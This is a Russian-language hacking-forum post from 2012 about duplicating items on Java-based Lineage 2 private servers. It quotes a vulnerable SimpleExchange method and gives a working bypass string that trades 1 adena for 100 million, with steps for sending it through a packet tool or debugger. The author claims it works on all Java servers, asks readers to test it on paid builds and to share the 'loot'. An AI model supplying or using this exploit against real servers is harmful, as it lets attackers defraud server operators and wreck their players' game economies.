Регистрация Главная Пользователи Все разделы прочитаны
Сообщения за день Справка Регистрация

дюпчег

-

Подполье Lineage 2 (0 уровень)

- Темы, перенесенные из Подполья 1 уровня (архивные за 2008-2015). Отличная основа для поиска новых уязвимостей.

Ответ
 
Опции темы
Старый 16.10.2012, 19:56   #1
 Рыцарь
Аватар для 4ipolino
 
4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса4ipolino троюродный дядя Чака Норриса
Регистрация: 19.02.2010
Сообщений: 340
Популярность: 9058
Сказал(а) спасибо: 301
Поблагодарили 696 раз(а) в 278 сообщениях
Отправить сообщение для 4ipolino с помощью ICQ Отправить сообщение для 4ipolino с помощью Telegram Отправить сообщение для 4ipolino с помощью Yahoo Отправить сообщение для 4ipolino с помощью Skype™
 
По умолчанию дюпчег

уязвимый участок кода:
Код:
    public void SimpleExchange(String[] param) {
        if (param.length < 4)
            throw new IllegalArgumentException();

        Player player = getSelf();
        if (player == null)
            return;

        int itemToTake = Integer.parseInt(param[0]);
        long countToTake = Long.parseLong(param[1]);
        int itemToGive = Integer.parseInt(param[2]);
        long countToGive = Long.parseLong(param[3]);

        if (getItemCount(player, itemToTake) < countToTake) {
            player.sendPacket(itemToTake == 57 ? Msg.YOU_DO_NOT_HAVE_ENOUGH_ADENA : SystemMsg.INCORRECT_ITEM_COUNT);
            return;
        }

        removeItem(player, itemToTake, countToTake);
        addItem(player, itemToGive, countToGive);
    }
не охота было качать пакетник, сделаем проще для наглядного примера:
1. качаю и запускаю сервер л2.
2. редактирою диалог 30008:
Код:
test:

[scripts_Util:SimpleExchange 57 1 57 100000000|Тест выдачи итема]
3. захожу в игру и откриваю диалог с данным нпсом:
[Ссылки могут видеть только зарегистрированные пользователи. ]
4. нажимаю ссылку и получаю:
Код:
http://rghost.ru/40973617/image.png
рассмотрим строку вызова подробнее:
[scripts_Util:SimpleExchange 57 1 57 100000000|Тест выдачи итема]

через пакетник вызов скорее всего будет происходить через bypass -h или bypass (аналогично через дебагеры в оперативке)
дальше сам клас и метод
Код:
scripts_Util:SimpleExchange
после пишем итем который мы отдаем и количество
Код:
57 1
и на конец ид итема который получаем и количество
Код:
57 100000000
данный код присутствует на всех ява серверах (проверял от финала и выше)

Добавлено через 2 минуты
п.с не помешает проверить на платных сборках
и вторая большая просьба не убивать сервера, а если и убиваете делитесь добычей

Добавлено через 1 час 4 минуты
по аналогу [Ссылки могут видеть только зарегистрированные пользователи. ] можно использовать дебагеры

Последний раз редактировалось 4ipolino; 22.10.2015 в 12:52. Причина: Добавлено сообщение
  Ответить с цитированием
Ответ

Опции темы

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход

Заявление об ответственности / Список мошенников

Часовой пояс GMT +4, время: 03:08.

Пишите нам: [email protected]
Copyright © 2024 vBulletin Solutions, Inc.
Translate: zCarot. Webdesign by DevArt (Fox)
G-gaMe! Team production | Since 2008
Hosted by GShost.net